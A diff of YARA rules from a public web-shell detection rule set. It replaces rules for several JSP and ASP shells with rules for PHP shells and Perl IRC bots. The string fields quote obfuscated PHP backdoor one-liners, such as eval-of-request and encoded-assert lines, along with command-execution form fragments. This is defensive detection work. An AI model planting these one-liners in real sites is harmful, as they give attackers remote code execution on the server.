 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1999-L2012"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3540-L3555"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "91c5fae02ab16d51fc5af9354ac2f015"
-		logic_hash = "12b957b7e0d0823721273ab71a19ee62d84a8dc5f584a46691f0e0aef996386e"
+		hash = "ea75280224a735f1e445d244acdfeb7b"
+		logic_hash = "495dc6c6769b8605ea946c012ad0ebb54685e7e91afd383027640753d90c6b3f"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@include($_GET['bug']);" fullword
+		$s1 = "array_map(\"asx73ert\",(ar"
+		$s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword
+		$s4 = "shell.php?qid=zxexp  " fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Caidao_Shell_Hkmjj
+rule SIGNATURE_BASE_Webshell_Webshells_New_Xxx
 {
 	meta:
-		description = "Web Shell - file hkmjj.asp"
+		description = "Web shells - generated from file xxx.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2013-L2026"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3556-L3569"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e7b994fe9f878154ca18b7cde91ad2d0"
-		logic_hash = "9a25df170ed165fe6528e6b9374ae572bcd26cd2e1f4014c7aa4953122671fac"
+		hash = "0e71428fe68b39b70adb6aeedf260ca0"
+		logic_hash = "837ed266af8a65ac683be39c32509df34bc8041b336a71c12700ca73bf210b4d"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\"  " fullword
+		$s3 = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Asd
+rule SIGNATURE_BASE_Webshell_Getpostphp
 {
 	meta:
-		description = "Web Shell - file asd.jsp"
+		description = "Web shells - generated from file GetPostpHp.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2027-L2041"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3570-L3583"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a042c2ca64176410236fcc97484ec599"
-		logic_hash = "6620b796b55a67010cd3edebc2ec84c2657717722129ea46288d262cfd1c7e1c"
+		hash = "20ede5b8182d952728d594e6f2bb5c76"
+		logic_hash = "e75f66200593c3fdaadf1881235847f6c3f3caadcb7ffe13e8b01bce5f922702"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword
-		$s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url"
+		$s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Metaslsoft
+rule SIGNATURE_BASE_Webshell_Webshells_New_Php5
 {
 	meta:
-		description = "Web Shell - file metaslsoft.php"
+		description = "Web shells - generated from file php5.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2043-L2056"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3584-L3597"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "aa328ed1476f4a10c0bcc2dde4461789"
-		logic_hash = "20d938fbe21bcf04f09c6450a9acd5db556e9c9f83149d3cdd098be7a905d5ca"
+		hash = "cf2ab009cbd2576a806bfefb74906fdf"
+		logic_hash = "280be378bc6cf52ef9454083180015ed00f9d0bc936620a4105c34c3a3002383"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t"
+		$s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Ajan
+rule SIGNATURE_BASE_Webshell_Webshells_New_PHP
 {
 	meta:
-		description = "Web Shell - file Ajan.asp"
+		description = "Web shells - generated from file PHP.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2057-L2070"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3598-L3615"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b6f468252407efc2318639da22b08af0"
-		logic_hash = "1817786725de61150f1b3ff57597c780323a7f4df1c046cfd473e1918decd7d2"
+		hash = "a524e7ae8d71e37d2fd3e5fbdab405ea"
+		logic_hash = "706f835f63e153f907ae8a5a48f1dc4b9d3b8511b21b7155bc045b0ebdc893fc"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate"
+		$s1 = "echo \"<font color=blue>Error!</font>\";" fullword
+		$s2 = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE"
+		$s5 = " - ExpDoor.com</title>" fullword
+		$s10 = "$f=fopen($_POST[\"f\"],\"w\");" fullword
+		$s12 = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Config_Myxx_Zend
+rule SIGNATURE_BASE_Webshell_Webshells_New_Asp
 {
 	meta:
-		description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp"
+		description = "Web shells - generated from file Asp.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2071-L2087"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3616-L3631"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "161dc712f279e73ea8cab4b0298cc2ca3799c6d9107050c4231a81021caed37f"
+		hash = "32c87744ea404d0ea0debd55915010b7"
+		logic_hash = "dd2e9f753e8fa781c28c2d5bb9336bb3f39ed8a496bd89eb54bc1812ef512ab5"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "d44df8b1543b837e57cc8f25a0a68d92"
-		hash1 = "e0354099bee243702eb11df8d0e046df"
-		hash2 = "591ca89a25f06cf01e4345f98a22845c"
 
 	strings:
-		$s3 = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');"
+		$s1 = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" fullword
+		$s2 = "Function MorfiCoder(Code)" fullword
+		$s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Browser_201_3_Ma_Download
+rule SIGNATURE_BASE_Perlbot_Pl
 {
 	meta:
-		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file perlbot.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "378cb0e4-2069-50b7-ab3e-5a81055e9983"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2088-L2107"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3635-L3646"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3605e1304fb314c13d6c94d6ac9337731c6ee4fef679444d599cb3ae29023b56"
-		score = 70
+		hash = "7e4deb9884ffffa5d82c22f8dc533a45"
+		logic_hash = "784980d620e71fb0cf5aed9ef8bd171a8f50d850bc782645575070b75c42e426"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
-		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
-		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
-		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
-		hash4 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a"
-		$s3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith"
+		$s0 = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")"
+		$s1 = "#Acesso a Shel - 1 ON 0 OFF"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Itsec_Itsecteam_Shell_Jhn
+rule SIGNATURE_BASE_Php_Backdoor_Php
 {
 	meta:
-		description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file php-backdoor.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "aca53071-f793-538d-bbeb-34469cdb4d1f"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2108-L2125"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3647-L3659"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2775d7e47a26e06ea716bdca32a0f768eccf4d269caa3d107b4a78f8684ce741"
-		score = 70
+		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+		logic_hash = "acab82b40760b45d49da51953f78c69166955de54918634c9bfe394208cdbb56"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
-		hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4"
-		hash2 = "40c6ecf77253e805ace85f119fe1cebb"
 
 	strings:
-		$s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b"
-		$s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'"
+		$s0 = "http://michaeldaw.org   2006"
+		$s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win"
+		$s3 = "coded by z0mbie"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Ghost_Source_Icesword_Silic
+rule SIGNATURE_BASE_Liz0Zim_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_Php
 {
 	meta:
-		description = "Web Shell - from files ghost_source.php, icesword.php, silic.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "e91114ce-18f9-51cd-b41c-b796960ea4fe"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2126-L2143"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3660-L3672"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "22879d5279866e3c25a5b41a98b44595f191cfcac6489208b0bdb6b7ca7201e5"
-		score = 70
+		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+		logic_hash = "a0606dad4474579354709fe6306d15427afc4dec8ad6760a0ee9e91c86c23e4d"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "cbf64a56306c1b5d98898468fc1fdbd8"
-		hash1 = "6e20b41c040efb453d57780025a292ae"
-		hash2 = "437d30c94f8eef92dc2f064de4998695"
 
 	strings:
-		$s3 = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $"
-		$s6 = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST["
+		$s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt"
+		$s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass"
+		$s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Jspspy_Jspspyjdk5_Jspspyjdk51_Luci_Jsp_Spy2009_M_Ma3_Xxx
+rule SIGNATURE_BASE_Nshell__1__Php_Php
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file Nshell (1).php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "44e8b6c5-6f41-5c37-a083-26acedd91956"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2144-L2187"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3673-L3684"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6c61e5ccd4800f0cfd20532ab43f917f39a7367cc09cbe92e5320eb2c97fabf3"
-		score = 70
+		hash = "973fc89694097a41e684b43a21b1b099"
+		logic_hash = "53c7cd24c4eddbded1b4c16fd2758bdf66c0bbe396e487a56d56fc053cf3cc1a"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
-		hash4 = "8b457934da3821ba58b06a113e0d53d9"
-		hash5 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
-		hash6 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash7 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash8 = "d71716df5042880ef84427acee8b121e"
-		hash9 = "341298482cf90febebb8616426080d1d"
-		hash10 = "29aebe333d6332f0ebc2258def94d57e"
-		hash11 = "42654af68e5d4ea217e6ece5389eb302"
-		hash12 = "88fc87e7c58249a398efd5ceae636073"
-		hash13 = "4a812678308475c64132a9b56254edbc"
-		hash14 = "9626eef1a8b9b8d773a3b2af09306a10"
-		hash15 = "344f9073576a066142b2023629539ebd"
-		hash16 = "32dea47d9c13f9000c4c807561341bee"
-		hash17 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash18 = "655722eaa6c646437c8ae93daac46ae0"
-		hash19 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash20 = "9c94637f76e68487fa33f7b0030dd932"
-		hash21 = "6acc82544be056580c3a1caaa4999956"
-		hash22 = "6aa32a6392840e161a018f3907a86968"
-		hash23 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-		hash24 = "3ea688e3439a1f56b16694667938316d"
-		hash25 = "ab77e4d1006259d7cbc15884416ca88c"
-		hash26 = "71097537a91fac6b01f46f66ee2d7749"
-		hash27 = "2434a7a07cb47ce25b41d30bc291cacc"
-		hash28 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s8 = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype="
-		$s9 = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T"
+		$s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($"
+		$s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_2_520_Job_Ma1_Ma4_2
-{
-	meta:
-		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+rule SIGNATURE_BASE_Shankar_Php_Php
+{
+	meta:
+		description = "Semi-Auto-generated  - file shankar.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "0c8ab3eb-574b-5e5a-8117-4efecef94f83"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2188-L2208"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3685-L3697"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "db76ff42079b20d9e5c40661d7b30206e6bffc828f55daa4dc210662068f8e27"
-		score = 70
+		hash = "6eb9db6a3974e511b7951b8f7e7136bb"
+		logic_hash = "58b365206c18b8394cf1e03b71b8e47be10bc933bc2c05b7b03b7dad94f6d6b8"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "64a3bf9142b045b9062b204db39d4d57"
-		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
-		hash2 = "56c005690da2558690c4aa305a31ad37"
-		hash3 = "532b93e02cddfbb548ce5938fe2f5559"
-		hash4 = "6e0fa491d620d4af4b67bae9162844ae"
-		hash5 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
 
 	strings:
-		$s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" "
-		$s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR"
+		$sAuthor = "ShAnKaR"
+		$s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input"
+		$s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b"
 
 	condition:
-		all of them
+		1 of ( $s* ) and $sAuthor
 }
-rule SIGNATURE_BASE_Webshell_000_403_807_A_C5_Config_Css_Dm_He1P_Jspspy_Jspspyjdk5_Jspspyjdk51_Luci_Jsp_Xxx
+rule SIGNATURE_BASE_Casus15_Php_Php
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file Casus15.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ba6748a2-fb80-5eda-816c-155bab9285e5"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2209-L2255"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3698-L3710"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cda47d7967b0f4b2a274ff2196d27d2e108b00917812093bbb3f033a8a1d1c3c"
-		score = 70
+		hash = "5e2ede2d1c4fa1fcc3cbfe0c005d7b13"
+		logic_hash = "6ee7a07163d33ca329d3be2084406629711db14db4605e8413ee963eb0f9d5a7"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
-		hash4 = "8b457934da3821ba58b06a113e0d53d9"
-		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
-		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
-		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash9 = "d71716df5042880ef84427acee8b121e"
-		hash10 = "341298482cf90febebb8616426080d1d"
-		hash11 = "29aebe333d6332f0ebc2258def94d57e"
-		hash12 = "42654af68e5d4ea217e6ece5389eb302"
-		hash13 = "88fc87e7c58249a398efd5ceae636073"
-		hash14 = "4a812678308475c64132a9b56254edbc"
-		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
-		hash16 = "e0354099bee243702eb11df8d0e046df"
-		hash17 = "344f9073576a066142b2023629539ebd"
-		hash18 = "32dea47d9c13f9000c4c807561341bee"
-		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash20 = "655722eaa6c646437c8ae93daac46ae0"
-		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash22 = "9c94637f76e68487fa33f7b0030dd932"
-		hash23 = "6acc82544be056580c3a1caaa4999956"
-		hash24 = "6aa32a6392840e161a018f3907a86968"
-		hash25 = "591ca89a25f06cf01e4345f98a22845c"
-		hash26 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-		hash27 = "3ea688e3439a1f56b16694667938316d"
-		hash28 = "ab77e4d1006259d7cbc15884416ca88c"
-		hash29 = "71097537a91fac6b01f46f66ee2d7749"
-		hash30 = "2434a7a07cb47ce25b41d30bc291cacc"
-		hash31 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s0 = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword
-		$s1 = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword
+		$s0 = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na"
+		$s2 = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'"
+		$s3 = "value='Calistirmak istediginiz "
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Wso2_5_1_Wso2_5_Wso2
+rule SIGNATURE_BASE_Small_Php_Php
 {
 	meta:
-		description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file small.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "cf4fb88f-a312-560d-be0b-b55bfcb889be"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2256-L2273"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3711-L3723"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f2dce52f1b8d2c33cd8478a468383a87f13712dc6e5c9050fea6ede4f0d24cc5"
-		score = 70
+		hash = "fcee6226d09d150bfa5f103bee61fbde"
+		logic_hash = "e0444aa604e8956d423037b70b9476f5653503055d0f1bc875d43de144ce5c44"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "dbeecd555a2ef80615f0894027ad75dc"
-		hash1 = "7c8e5d31aad28eb1f0a9a53145551e05"
-		hash2 = "cbc44fb78220958f81b739b493024688"
 
 	strings:
-		$s7 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec"
-		$s8 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na"
+		$s1 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+		$s2 = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1"
+		$s4 = "@ini_set('error_log',NULL);" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_000_403_C5_Querydong_Spyjsp2010_T00Ls
+rule SIGNATURE_BASE_Shellbot_Pl
 {
 	meta:
-		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file shellbot.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "07c145b1-c9f7-564a-b354-a6d2072f380c"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
